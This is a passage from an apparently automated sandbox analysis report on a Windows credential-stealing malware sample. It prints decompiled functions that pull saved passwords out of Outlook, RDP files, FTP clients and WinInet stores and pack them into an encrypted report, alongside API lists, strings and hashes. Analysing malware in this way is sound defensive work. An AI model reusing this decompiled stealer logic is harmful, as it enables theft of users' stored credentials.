                                                                        				char _t83;
                                                                        				char* _t84;
                                                                        				char* _t85;
                                                                        				char* _t86;
                                                                        
                                                                        				_t45 = E00401E53(_a8);
                                                                        				if(_t45 != 0) {
                                                                        					"_OP3_Password2" = 0x50;
                                                                        					"_MTP_Password2" = 0x53;
                                                                        					_t48 = E00401F1B(__eflags, _a8,  &_v20);
                                                                        					__eflags = _t48;
                                                                        					if(_t48 != 0) {
                                                                        						_push(_v8);
                                                                        						_pop( *_t5);
                                                                        						_v40 = _v40 >> 1;
                                                                        						_t50 = E0040296C(_v12, _v40);
                                                                        						__eflags = _t50;
                                                                        						if(_t50 == 0) {
                                                                        							_v24 = E004017EC(_v8);
                                                                        							E00401823(_v12, _v24, _v8);
                                                                        							_t85 = _v24;
                                                                        						} else {
                                                                        							_v24 = _t50;
                                                                        							_t85 = _t50;
                                                                        						}
                                                                        						while(1) {
                                                                        							_t86 = _t85;
                                                                        							__eflags = _t86;
                                                                        							if(_t86 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							__eflags =  *_t86;
                                                                        							if( *_t86 != 0) {
                                                                        								_t84 = "<_OP3_Password2";
                                                                        								while(1) {
                                                                        									_t59 = StrStrA(_t86, _t84);
                                                                        									__eflags = _t59;
                                                                        									if(_t59 != 0) {
                                                                        										break;
                                                                        									}
                                                                        									L10:
                                                                        									asm("cld");
                                                                        									asm("repne scasb");
                                                                        									__eflags =  *_t84;
                                                                        									if( *_t84 != 0) {
                                                                        										continue;
                                                                        									}
                                                                        									goto L24;
                                                                        								}
                                                                        								_t62 = StrStrIA(_t59, 0x416390);
                                                                        								__eflags = _t62;
                                                                        								if(_t62 != 0) {
                                                                        									_t85 = _t62 + 1;
                                                                        									_v28 = _t85;
                                                                        									_t65 = StrStrA(_t85, 0x416392);
                                                                        									__eflags = _t65;
                                                                        									if(_t65 != 0) {
                                                                        										 *_t65 = 0;
                                                                        										_push(_t65);
                                                                        										_push( *_t65);
                                                                        										_t67 = lstrlenA(_v28);
                                                                        										__eflags = _t67;
                                                                        										if(_t67 != 0) {
                                                                        											_v32 = _t67;
                                                                        											_v36 = E0040294B(_v28);
                                                                        											_t70 = E00402A3B(_v36, _v32);
                                                                        											__eflags = _t70;
                                                                        											if(_t70 != 0) {
                                                                        												_v32 = _v32 >> 1;
                                                                        												 *_t26 =  *0x416388;
                                                                        												 *_t27 =  *0x41638c;
                                                                        												_t75 = E004041BC(_v36,  &_v32,  &_v48);
                                                                        												__eflags = _t75;
                                                                        												if(_t75 != 0) {
                                                                        													E00401486(_a4, 0xbeef0001);
                                                                        													E004014E8(_a4, _v28);
                                                                        													E004014BC(_a4, _v36, _v32);
                                                                        												}
                                                                        											}
                                                                        											E004017D5(_v36);
                                                                        										}
                                                                        										_pop(_t83);
                                                                        										_pop(_t68);
                                                                        										 *_t68 = _t83;
                                                                        										continue;
                                                                        									}
                                                                        								} else {
                                                                        								}
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						L24:
                                                                        						E00401486(_a4, 0xbeef0002);
                                                                        						E004014BC(_a4, _v12, _v8);
                                                                        						E004017D5(_v24);
                                                                        						return E00401FB0( &_v20);
                                                                        					}
                                                                        					return _t48;
                                                                        				} else {
                                                                        					return _t45;
                                                                        				}
                                                                        			}




























                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: <_OP3_Password2
                                                                        • API String ID: 0-4172175086
                                                                        • Opcode ID: 654973a1006a4803e0c5775a1734a04b48ce5acc9a359d74e5f5969f10b4ccec
                                                                        • Instruction ID: 77b5fce038b4bca379508027ff7cf5d2a33336c3527dc7fb70d514a4f254e7d3
                                                                        • Opcode Fuzzy Hash: 654973a1006a4803e0c5775a1734a04b48ce5acc9a359d74e5f5969f10b4ccec
                                                                        • Instruction Fuzzy Hash: 6D417F72C00109AECF12ABA2CC019EEBEB5EB54354F14847BF414B21B1D73D8E61EB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 80%
                                                                        			E0040CEA2(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v20;
                                                                        				signed char _v24;
                                                                        				CHAR* _v28;
                                                                        				signed char _v32;
                                                                        				void* _v36;
                                                                        				char _v40;
                                                                        				void* _v44;
                                                                        				char _v48;
                                                                        				signed char _t40;
                                                                        				signed char _t43;
                                                                        				signed char _t51;
                                                                        				signed char _t53;
                                                                        				signed char _t55;
                                                                        				signed char _t59;
                                                                        				signed char _t64;
                                                                        				signed char _t65;
                                                                        				char _t66;
                                                                        
                                                                        				if( *0x41442d != 0) {
                                                                        					_t40 = E00401F1B(__eflags, _a8,  &_v20);
                                                                        					__eflags = _t40;
                                                                        					if(_t40 != 0) {
                                                                        						__eflags = _v8 - 0x100000;
                                                                        						if(_v8 >= 0x100000) {
                                                                        							L23:
                                                                        							return E00401FB0( &_v20);
                                                                        						}
                                                                        						_t43 = E004022C7(_v12, _v8);
                                                                        						__eflags = _t43;
                                                                        						if(_t43 != 0) {
                                                                        							goto L23;
                                                                        						}
                                                                        						_v24 = E0040CDD0("username:s:", _v12, _v8);
                                                                        						_v28 = E0040CDD0("password 51:b:", _v12, _v8);
                                                                        						_v32 = E0040CDD0("full address:s:", _v12, _v8);
                                                                        						__eflags = _v24;
                                                                        						if(_v24 == 0) {
                                                                        							L22:
                                                                        							E004017D5(_v24);
                                                                        							E004017D5(_v28);
                                                                        							E004017D5(_v32);
                                                                        							goto L23;
                                                                        						}
                                                                        						__eflags = _v28;
                                                                        						if(_v28 == 0) {
                                                                        							goto L22;
                                                                        						}
                                                                        						__eflags = _v32;
                                                                        						if(_v32 != 0) {
                                                                        							_t51 = lstrlenA(_v28);
                                                                        							_t64 = _t51 >> 1;
                                                                        							_push(_t64);
                                                                        							while(1) {
                                                                        								_t65 = _t64;
                                                                        								__eflags = _t65;
                                                                        								if(_t65 == 0) {
                                                                        									break;
                                                                        								}
                                                                        								asm("lodsw");
                                                                        								__eflags = _t51 - 0x30;
                                                                        								if(_t51 < 0x30) {
                                                                        									L12:
                                                                        									_t53 = _t51 - 0x41 + 0xa;
                                                                        									__eflags = _t53;
                                                                        									L13:
                                                                        									__eflags = _t53 - 0x30;
                                                                        									if(_t53 < 0x30) {
                                                                        										L16:
                                                                        										_t55 = _t53 - 0x41 + 0xa;
                                                                        										__eflags = _t55;
                                                                        										L17:
                                                                        										_t51 = _t55 << 0x00000004 | _t55 << 0x00000004;
                                                                        										asm("stosb");
                                                                        										_t64 = _t65 - 1;
                                                                        										__eflags = _t64;
                                                                        										continue;
                                                                        									}
                                                                        									__eflags = _t53 - 0x39;
                                                                        									if(_t53 > 0x39) {
                                                                        										goto L16;
                                                                        									}
                                                                        									_t55 = _t53 - 0x30;
                                                                        									goto L17;
                                                                        								}
                                                                        								__eflags = _t51 - 0x39;
                                                                        								if(_t51 > 0x39) {
                                                                        									goto L12;
                                                                        								}
                                                                        								_t53 = _t51 - 0x30;
                                                                        								goto L13;
                                                                        							}
                                                                        							_pop(_t66);
                                                                        							_v40 = _t66;
                                                                        							_push(_v28);
                                                                        							_pop( *_t22);
                                                                        							_v44 = 0;
                                                                        							_t59 =  *0x41442d( &_v40, 0, 0, 0, 0, 1,  &_v48);
                                                                        							__eflags = _t59;
                                                                        							if(_t59 != 0) {
                                                                        								__eflags = _v44;
                                                                        								if(__eflags != 0) {
                                                                        									E0040CC8E(__eflags, _a4, _v24, _v32, _v44, _v48);
                                                                        									LocalFree(_v44);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L22;
                                                                        					}
                                                                        					return _t40;
                                                                        				} else {
                                                                        					return __eax;
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040CF47
                                                                        • LocalFree.KERNEL32(00000000), ref: 0040CFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeLocallstrlen
                                                                        • String ID: full address:s:$password 51:b:$username:s:
                                                                        • API String ID: 3681330831-2945746679
                                                                        • Opcode ID: 3fe55126ee548df5cd7947a5c5ab92820d57a4bc6a1a7a61529fff14c4b352be
                                                                        • Instruction ID: 60ed0193d19ee7ec15275bf9add7d535b63f43271d864edcc8c9435468f68b04
                                                                        • Opcode Fuzzy Hash: 3fe55126ee548df5cd7947a5c5ab92820d57a4bc6a1a7a61529fff14c4b352be
                                                                        • Instruction Fuzzy Hash: CB412B7285010AEADF119BE1CD46BEEBB76AB48314F14023BE201711E0D6B94A92DB5E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E0040CDD0(char* _a4, short* _a8, intOrPtr _a12) {
                                                                        				unsigned int _v8;
                                                                        				char* _v12;
                                                                        				int _v16;
                                                                        				int _t24;
                                                                        				char* _t28;
                                                                        				int _t29;
                                                                        				CHAR* _t30;
                                                                        				int _t32;
                                                                        				CHAR* _t39;
                                                                        				void* _t40;
                                                                        				void* _t41;
                                                                        				int _t42;
                                                                        
                                                                        				_v12 = 0;
                                                                        				_v16 = 0;
                                                                        				_push(_a12);
                                                                        				_pop( *_t4);
                                                                        				_v8 = _v8 >> 1;
                                                                        				_t24 = WideCharToMultiByte(0, 0, _a8, _v8, 0, 0, 0, 0);
                                                                        				if(_t24 != 0) {
                                                                        					_v12 = E004017EC(_t24);
                                                                        					_t42 = _t24;
                                                                        					if(WideCharToMultiByte(0, 0, _a8, _v8, _v12, _t42, 0, 0) == 0) {
                                                                        						E004017D5(_v12);
                                                                        						_v12 = 0;
                                                                        					}
                                                                        				}
                                                                        				if(_v12 == 0) {
                                                                        					L12:
                                                                        					E004017D5(_v12);
                                                                        					return _v16;
                                                                        				} else {
                                                                        					_t28 = StrStrIA(_v12, _a4);
                                                                        					if(_t28 == 0) {
                                                                        						goto L12;
                                                                        					}
                                                                        					_t29 = lstrlenA(_a4);
                                                                        					_t40 = _t28;
                                                                        					_t30 = _t29 + _t40;
                                                                        					_t39 = _t30;
                                                                        					while( *_t30 != 0) {
                                                                        						if( *_t30 != 0xd) {
                                                                        							_t30 =  &(_t30[1]);
                                                                        							continue;
                                                                        						}
                                                                        						 *_t30 = 0;
                                                                        						_t32 = lstrlenA(_t39);
                                                                        						if(_t32 != 0) {
                                                                        							_v16 = E004017EC(_t32);
                                                                        							_t41 = _t32;
                                                                        							E00401823(_t39, _v16, _t41);
                                                                        						}
                                                                        						goto L12;
                                                                        					}
                                                                        					goto L12;
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE00
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040CE26
                                                                        • StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE4A
                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE6C
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE57
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharLocalMultiWidelstrlen$AllocFree
                                                                        • String ID:
                                                                        • API String ID: 1890766102-0
                                                                        • Opcode ID: 6d8815957a45e9dfaf6c767d0e2a68735c9a9fd13d1a6cd547d648ce541a1017
                                                                        • Instruction ID: 6b6f5cbbcb276d5830e96960ee9e9a70e92c04bd6c7ad57fcd0bd2d929c8f237
                                                                        • Opcode Fuzzy Hash: 6d8815957a45e9dfaf6c767d0e2a68735c9a9fd13d1a6cd547d648ce541a1017
                                                                        • Instruction Fuzzy Hash: B8219276900208FEEF125FE1CC42F9E7BB9EB14314F20416AB114BA1E1D7BD5A80DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E004059DE(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char* _t9;
                                                                        				char* _t11;
                                                                        				void* _t22;
                                                                        				char* _t23;
                                                                        				char* _t24;
                                                                        
                                                                        				_t22 = __edx;
                                                                        				_v8 = E0040150D(_a4, 7, 0);
                                                                        				_t24 =  *0x414082; // 0x0
                                                                        				_t23 =  *0x414086; // 0x0
                                                                        				if( *_t23 != 0) {
                                                                        					do {
                                                                        						_t9 = StrStrIA(_t23, "FTP Navigator");
                                                                        						_t26 = _t9;
                                                                        						if(_t9 != 0) {
                                                                        							E00404131(_a4, E0040234A(_t26, _t24), "ftplist.txt", 0xbeef0000);
                                                                        							E004017D5(_t17);
                                                                        						}
                                                                        						_t11 = StrStrIA(_t23, "FTP Commander");
                                                                        						_t27 = _t11;
                                                                        						if(_t11 != 0) {
                                                                        							E00404131(_a4, E0040234A(_t27, _t24), "ftplist.txt", 0xbeef0000);
                                                                        							E004017D5(_t14);
                                                                        						}
                                                                        						while( *_t24 != 0) {
                                                                        							_t24 = _t24 + 1;
                                                                        							__eflags = _t24;
                                                                        						}
                                                                        						_t24 = _t24 + 1;
                                                                        						asm("cld");
                                                                        						asm("repne scasb");
                                                                        						_t29 =  *_t23;
                                                                        					} while ( *_t23 != 0);
                                                                        				}
                                                                        				return E00401553(_t22, _t29, _a4, _v8);
                                                                        			}










                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(00000000,FTP Navigator), ref: 00405A0C
                                                                        • StrStrIA.SHLWAPI(00000000,FTP Commander,00000000,FTP Navigator), ref: 00405A3A
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
                                                                          • Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
                                                                          • Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$FreeLocal
                                                                        • String ID: FTP Commander$FTP Navigator$ftplist.txt
                                                                        • API String ID: 1884169789-2424314702
                                                                        • Opcode ID: 071ed715c1575a53d15bd0aefe27d8b6db41900db9b29af0497b29d0d5fd1d10
                                                                        • Instruction ID: 47b874bb8b3e3dfff6b261f529f786fdb312fb9a703bd988841c28134be43e48
                                                                        • Opcode Fuzzy Hash: 071ed715c1575a53d15bd0aefe27d8b6db41900db9b29af0497b29d0d5fd1d10
                                                                        • Instruction Fuzzy Hash: 2C0126706405057ADF117B728C02FAF3E29DF90324F24013BB855B51E2EB7C5E828AAD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E0040D055(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char* _t8;
                                                                        				void* _t19;
                                                                        				char* _t20;
                                                                        
                                                                        				_t19 = __edx;
                                                                        				_v8 = E0040150D(_a4, 0x46, 0);
                                                                        				_t20 =  *0x414082; // 0x0
                                                                        				if( *_t20 == 0) {
                                                                        					L7:
                                                                        					return E00401553(_t19, _t24, _a4, _v8);
                                                                        				} else {
                                                                        					goto L1;
                                                                        				}
                                                                        				do {
                                                                        					L1:
                                                                        					_t8 = StrStrIA(_t20, "FTPNow");
                                                                        					_t22 = _t8;
                                                                        					if(_t8 == 0) {
                                                                        						__eflags = StrStrIA(_t20, "FTP Now");
                                                                        						if(__eflags == 0) {
                                                                        							goto L6;
                                                                        						}
                                                                        						L4:
                                                                        						_t14 = E0040234A(_t22, _t20);
                                                                        						if(E0040234A(_t22, _t20) != 0) {
                                                                        							E00404131(_a4, _t14, "sites.xml", 0xbeef0000);
                                                                        							E004017D5(_t14);
                                                                        						}
                                                                        						goto L6;
                                                                        					}
                                                                        					goto L4;
                                                                        					L6:
                                                                        					asm("cld");
                                                                        					asm("repne scasb");
                                                                        					_t24 =  *_t20;
                                                                        				} while ( *_t20 != 0);
                                                                        				goto L7;
                                                                        			}








                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(00000000,FTPNow), ref: 0040D07C
                                                                        • StrStrIA.SHLWAPI(00000000,FTP Now,00000000,FTPNow), ref: 0040D08D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FTP Now$FTPNow$sites.xml
                                                                        • API String ID: 0-284577462
                                                                        • Opcode ID: 0860df4516fb36a40e406cc847c61d919e130169d8f6226aaa304c7ed75c8c5c
                                                                        • Instruction ID: 498bbafb3df18556925cf8714bf549501193d9edb70c728f32a1b086909ed1ed
                                                                        • Opcode Fuzzy Hash: 0860df4516fb36a40e406cc847c61d919e130169d8f6226aaa304c7ed75c8c5c
                                                                        • Instruction Fuzzy Hash: 58F0F971D04601B9DB312BB18C02FAF3E654BC1768F24013BB61DB51E2DB7C9E82965D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E0040C5EC(void* __eax, intOrPtr _a4, char* _a8) {
                                                                        				short* _v8;
                                                                        				int _v12;
                                                                        				void* _v16;
                                                                        				char _v20;
                                                                        				intOrPtr _v24;
                                                                        				intOrPtr _v28;
                                                                        				intOrPtr _t37;
                                                                        				intOrPtr _t40;
                                                                        				intOrPtr _t42;
                                                                        				intOrPtr _t47;
                                                                        
                                                                        				if( *0x4143e1 != 0) {
                                                                        					_v12 = MultiByteToWideChar(0, 0, _a8, 0xffffffff, 0, 0);
                                                                        					_v8 = E004017EC(_v12);
                                                                        					MultiByteToWideChar(0, 0, _a8, 0xffffffff, _v8, _v12);
                                                                        					_t37 =  *0x4143e1(_v8, 0, 0x12, 0, 0,  &_v16);
                                                                        					__eflags = _t37;
                                                                        					if(_t37 >= 0) {
                                                                        						_t52 =  *_v16;
                                                                        						_t40 =  *((intOrPtr*)( *_v16 + 0x10))(_v16, L"Settings", 0, 0x12, 0,  &_v20);
                                                                        						__eflags = _t40;
                                                                        						if(_t40 >= 0) {
                                                                        							_t42 = E0040106A(_t40, _t52, _v20);
                                                                        							_v28 = _t42;
                                                                        							_t43 = _t42;
                                                                        							__eflags = _t42;
                                                                        							if(_t42 != 0) {
                                                                        								_v24 = E004017EC(_v28);
                                                                        								_t47 = E0040110B(E00401273(_t45, _t52, _v20), _t52, __eflags, _v20, _v24, _v28);
                                                                        								__eflags = _t47;
                                                                        								if(_t47 != 0) {
                                                                        									E00401486(_a4, 0xbeef0000);
                                                                        									E004014BC(_a4, _v24, _v28);
                                                                        								}
                                                                        								_t43 = E004017D5(_v24);
                                                                        							}
                                                                        							E00401019(_t43, _t52, _v20);
                                                                        						}
                                                                        						 *((intOrPtr*)( *_v16 + 8))(_v16);
                                                                        					}
                                                                        					return E004017D5(_v8);
                                                                        				} else {
                                                                        					return __eax;
                                                                        				}
                                                                        			}














                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C60C
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C62E
                                                                        • StgOpenStorage.OLE32(?,00000000,00000012,00000000,00000000,?,00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?), ref: 0040C642
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$OpenStorage
                                                                        • String ID: Settings
                                                                        • API String ID: 2489594185-473154195
                                                                        • Opcode ID: a2b115aa1aa571a68be8ce4951556402be1d1c12837cc5314d994e54b7dd4129
                                                                        • Instruction ID: 067bfa4a53f500e918e8827405899557c221b1b6cfe0abe27263aec1400916df
                                                                        • Opcode Fuzzy Hash: a2b115aa1aa571a68be8ce4951556402be1d1c12837cc5314d994e54b7dd4129
                                                                        • Instruction Fuzzy Hash: E531FC35A4010AFBDF11AFD1CC42FEEBB72AF04714F208266B610791F1D7769A50AB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E004016F2(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				void* _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				intOrPtr _v24;
                                                                        				intOrPtr _v28;
                                                                        				void* _t27;
                                                                        				signed int _t41;
                                                                        				signed int _t42;
                                                                        				signed int _t45;
                                                                        
                                                                        				_t49 = __edx;
                                                                        				_t45 = 0;
                                                                        				_t27 =  &_v8;
                                                                        				_push(_t27);
                                                                        				_push(_a4);
                                                                        				L00410DBE();
                                                                        				if(_t27 >= 0) {
                                                                        					_v16 = E0040106A(_t27, __edx, _a4);
                                                                        					_t27 = GlobalLock(_v8);
                                                                        					if(_t27 != 0) {
                                                                        						_v20 = _t27;
                                                                        						_v24 = E004017EC(E004124C2() + 0x500000);
                                                                        						_v28 = E004017EC(E004124C8(_v16) + 0x100000);
                                                                        						_v12 = E004124D6(_v20, _v28, _v16, _v24, 0, _v16);
                                                                        						E004012C7(GlobalUnlock(_v8), _t49, _a4);
                                                                        						_t41 = E0040149B(_a4, "PKDFILE0YUICRYPTED0YUI1.0", 8);
                                                                        						_t42 = E00401486(_a4, _v16);
                                                                        						_t45 = _t41 & _t42 & E004014BC(_a4, _v28, _v12);
                                                                        						E004017D5(_v24);
                                                                        						_t27 = E004017D5(_v28);
                                                                        					}
                                                                        				}
                                                                        				E0040125A(_t27, _t49, _a4);
                                                                        				return _t45;
                                                                        			}













                                                                        APIs
                                                                        • GetHGlobalFromStream.OLE32(?,?), ref: 00401702
                                                                        • GlobalLock.KERNEL32 ref: 0040171D
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • GlobalUnlock.KERNEL32(?,?,?,?,?,-00100000,-00500000), ref: 0040177B
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        • PKDFILE0YUICRYPTED0YUI1.0, xrefs: 0040178A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Global$Local$AllocFreeFromLockStreamUnlock
                                                                        • String ID: PKDFILE0YUICRYPTED0YUI1.0
                                                                        • API String ID: 1329788818-258907703
                                                                        • Opcode ID: 03f03f22bb2aa11fbb6c60be5ecb4a60618464061266b6a1867e958b8bd07468
                                                                        • Instruction ID: f2d47b6307a512ba182872b571bc651cab0e361a1f568c2dbe9588986264a33a
                                                                        • Opcode Fuzzy Hash: 03f03f22bb2aa11fbb6c60be5ecb4a60618464061266b6a1867e958b8bd07468
                                                                        • Instruction Fuzzy Hash: 1D212CB6D00108BFDF026FE2CD42AEDBE75EF10344F10413AB914B51B1E77A8AA09B59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00408390(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char** _a16) {
                                                                        				char* _v8;
                                                                        				char* _v12;
                                                                        				char* _v16;
                                                                        				char* _v20;
                                                                        				char* _v24;
                                                                        				void* _t47;
                                                                        				char* _t49;
                                                                        				char** _t50;
                                                                        				char* _t70;
                                                                        				void* _t71;
                                                                        				char* _t72;
                                                                        				char* _t73;
                                                                        				char* _t74;
                                                                        				char* _t75;
                                                                        				void* _t76;
                                                                        
                                                                        				_t76 = __eflags;
                                                                        				_t71 = __edx;
                                                                        				E00401388(_t47, _a4, 1, _a16);
                                                                        				_t49 = E00401304(_t76, _a4, _a16);
                                                                        				_t74 = _t49;
                                                                        				while(1) {
                                                                        					_t75 = _t74;
                                                                        					if(_t75 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t50 = _a16;
                                                                        					__eflags =  *_t50;
                                                                        					if( *_t50 == 0) {
                                                                        						return _t50;
                                                                        					}
                                                                        					_v8 = 0;
                                                                        					_t72 = E004082CF(_t71, _a4, _a12, _a16,  &_v8);
                                                                        					__eflags = _v8;
                                                                        					if(_v8 == 0) {
                                                                        						_v24 = 0;
                                                                        					} else {
                                                                        						_t70 = StrStrIA(_v8, "http://");
                                                                        						__eflags = _t70;
                                                                        						if(_t70 == 0) {
                                                                        							_t70 = StrStrIA(_v8, "https://");
                                                                        						}
                                                                        						_v24 = _t70;
                                                                        					}
                                                                        					__eflags = _v24;
                                                                        					if(_v24 != 0) {
                                                                        						E00401486(_a8, 0xbeef0001);
                                                                        						E004014E8(_a8, _v8);
                                                                        					}
                                                                        					while(1) {
                                                                        						_t73 = _t72;
                                                                        						__eflags = _t73;
                                                                        						if(_t73 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						__eflags =  *_a16;
                                                                        						if( *_a16 != 0) {
                                                                        							_v12 = 0;
                                                                        							_v16 = 0;
                                                                        							_v20 = 0;
                                                                        							E0040834C(_t71, _a4, _a16,  &_v12,  &_v16,  &_v20);
                                                                        							__eflags = _v24;
                                                                        							if(_v24 != 0) {
                                                                        								__eflags = _v12;
                                                                        								if(_v12 != 0) {
                                                                        									__eflags = _v16;
                                                                        									if(_v16 != 0) {
                                                                        										L17:
                                                                        										E004014E8(_a8, _v12);
                                                                        										E004014E8(_a8, _v16);
                                                                        										E004014E8(_a8, _v20);
                                                                        									} else {
                                                                        										__eflags = _v20;
                                                                        										if(_v20 != 0) {
                                                                        											goto L17;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							E004017D5(_v12);
                                                                        							E004017D5(_v16);
                                                                        							E004017D5(_v20);
                                                                        							_t72 = _t73 - 1;
                                                                        							__eflags = _t72;
                                                                        							continue;
                                                                        						} else {
                                                                        						}
                                                                        						break;
                                                                        					}
                                                                        					__eflags = _v24;
                                                                        					if(_v24 != 0) {
                                                                        						E00401486(_a8, 0);
                                                                        						E00401486(_a8, 0);
                                                                        						E00401486(_a8, 0);
                                                                        					}
                                                                        					_t49 = E004017D5(_v8);
                                                                        					_t74 = _t75 - 1;
                                                                        					__eflags = _t74;
                                                                        				}
                                                                        				return _t49;
                                                                        			}


















                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: http://$https://
                                                                        • API String ID: 0-1916535328
                                                                        • Opcode ID: a063d2c108344c13aabfd45f0258bb27b0b3823767d86f34b72639bd5456c7cb
                                                                        • Instruction ID: 13fb2b29f01f002918b78c72c7eb8ae77e77f5b78bf32f99a3c6c152548360db
                                                                        • Opcode Fuzzy Hash: a063d2c108344c13aabfd45f0258bb27b0b3823767d86f34b72639bd5456c7cb
                                                                        • Instruction Fuzzy Hash: CF41053180010AFBDF22AF91CE05BDE7B76AF00314F10817AB950351F1EB794AA0EB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • lstrlenW.KERNEL32(abe2869f-9b47-4cd9-a358-c22904dba7f7,?,?,00000000), ref: 0040A66D
                                                                        • LocalFree.KERNEL32(00000000), ref: 0040A6CF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeLocallstrlen
                                                                        • String ID: Microsoft_WinInet_*$abe2869f-9b47-4cd9-a358-c22904dba7f7
                                                                        • API String ID: 3681330831-3320880043
                                                                        • Opcode ID: 576424615bffc08a157af85e91cbfbecc0d476d7a66ca4336e9b72815a3144d6
                                                                        • Instruction ID: 303936e2a8a44d611f5ab066420c5948f3d508f4a04a3d0421c5e20b59dd798b
                                                                        • Opcode Fuzzy Hash: 576424615bffc08a157af85e91cbfbecc0d476d7a66ca4336e9b72815a3144d6
